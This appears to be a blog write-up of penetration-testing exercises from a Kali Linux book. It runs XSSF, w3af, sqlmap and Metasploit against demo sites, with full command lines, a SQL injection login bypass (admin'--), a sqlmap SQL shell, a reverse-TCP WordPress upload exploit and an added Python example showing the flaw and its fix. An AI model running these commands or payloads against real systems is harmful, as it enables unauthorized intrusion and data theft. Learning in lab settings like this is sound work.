p163 XSSF
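Kali 2.0 does not include XSSF by default, so download it first: https://code.google.com/archive/p/xssf/downloads
Unzip the downloaded zip file and merge its data, plugins, lab and other folders into the corresponding folders under /usr/share/metasploit-framework/; after that you can load xssf in msfconsole.
I followed the book, but the final attack did not succeed!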
msf auxiliary(browser_autopwn) > xssf_exploit 8 15
[*] Searching Metasploit launched module with JobID = '15'...
[+] A running exploit exists: 'Exploit: windows/browser/ie_createobject'
[*] Exploit execution started, press [CTRL + C] to stop it !
[+] Remaining victims to attack: [[1] (1)] (it stops here and never moves on)
^C[-] Exploit interrupted by the console user
p180 Practice exercises
1. Probe www.testfire.net for SQL injection vulnerabilities:
root@kali:~# w3af_console
w3af>>> plugins
w3af/plugins>>> audit sqli
w3af/plugins>>> crawl web_spider
w3af/plugins>>> back
w3af>>> target
w3af/config:target>>> set target http://www.testfire.net/bank/login.aspx
w3af/config:target>>> back
The configuration has been saved.
w3af>>> plugins
w3af/plugins>>> output html_file
w3af/plugins>>> output config html_file
w3af/plugins/output/config:html_file>>> set verbose True
w3af/plugins/output/config:html_file>>> back
The configuration has been saved.
w3af/plugins>>> back
w3af>>> start
The scan successfully found 8 URLs and 10 different injections points.
Scanning with sqlmap:
sqlmap -u "http://www.testfire.net/bank/login.aspx" --data "uid=Admin&passw=a&btnSubmit=Login"
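This detected some information about the back-end database.
At http://www.testfire.net/bank/login.aspx, entering the constructed input admin'-- logs in easily.
But how do I go further and get the information in the database? I haven't figured that out yet.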
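Why the admin'-- input gets past the login form, and what stops it, shown as an added example that is not part of the original post or of the target site's code. It assumes a hypothetical `users(uid, passw)` table in an in-memory SQLite database standing in for the unknown back end; the field names come from the sqlmap command above, and the stored password is a constructed sample kept in plaintext only for brevity.

```python
import sqlite3


def make_db():
    # Constructed sample data: one account in an in-memory database.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (uid TEXT PRIMARY KEY, passw TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'S3cret-constructed')")
    return db


def login_concatenated(db, uid, passw):
    # Vulnerable pattern: user input becomes part of the SQL text.
    # With uid = admin'-- the statement turns into
    #   ... WHERE uid = 'admin'--' AND passw = '...'
    # and everything after -- is a comment, so the password test is gone.
    sql = "SELECT uid FROM users WHERE uid = '%s' AND passw = '%s'" % (uid, passw)
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # input produced malformed SQL


def login_parameterized(db, uid, passw):
    # Hardened pattern: placeholders keep the input as data, never as SQL.
    sql = "SELECT uid FROM users WHERE uid = ? AND passw = ?"
    return db.execute(sql, (uid, passw)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    attempts = [
        ("admin", "S3cret-constructed"),  # legitimate login
        ("admin", "a"),                   # wrong password
        ("admin'--", "a"),                # input from the post
    ]
    for uid, passw in attempts:
        print("%-10s concatenated=%-5s parameterized=%s" % (
            uid,
            login_concatenated(db, uid, passw),
            login_parameterized(db, uid, passw),
        ))
```

The third attempt is the one to watch: the concatenated query accepts it without the password, while the parameterized query treats the whole string as a user name that does not exist.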
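2. Just follow p163 of the book.
3. wXf download address: https://github.com/forced-request/wXf
After downloading, unzip it, change to the extracted directory and run ./console, which reports: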
/usr/lib/ruby/2.2.0/rubygems/core_ext/kernel_require.rb:54:in `require': cannot load such file -- iconv (LoadError)
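Since I am not very familiar with Ruby and could not really follow the fixes I found online, I am skipping this for now.
4. I chose this vulnerability to test: https://www.exploit-db.com/exploits/37182/
However, the test result was: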
[CRITICAL] all tested parameters appear to be not injectable.
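I don't know whether this is down to the version of the back-end server software.
5. I don't know how to do this one... skipping it for now.
6. The following command successfully planted a SQL shell!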
sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#' --cookie='security=low; PHPSESSID=7918oeoatnur63rq8bokn88sd2' --sql-shell
7、p177
I followed the instructions step by step, but it did not succeed:
[*] Started reverse TCP handler on 10.10.10.128:4444
[*] Successfully uploaded shell.
[*] Trying to access shell at <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>413 Request Entity Too Large</title>
</head><body>
<h1>Request Entity Too Large</h1>
The requested resource<br />/wordpress//wp-content/plugins/1-flash-gallery/upload.php<br />
does not allow request data with POST requests, or the amount of data provided in the request exceeds the capacity limit.
</body></html> ...
[*] Exploit completed, but no session was created.
Original article: http://www.cnblogs.com/justforfun12/p/5211907.html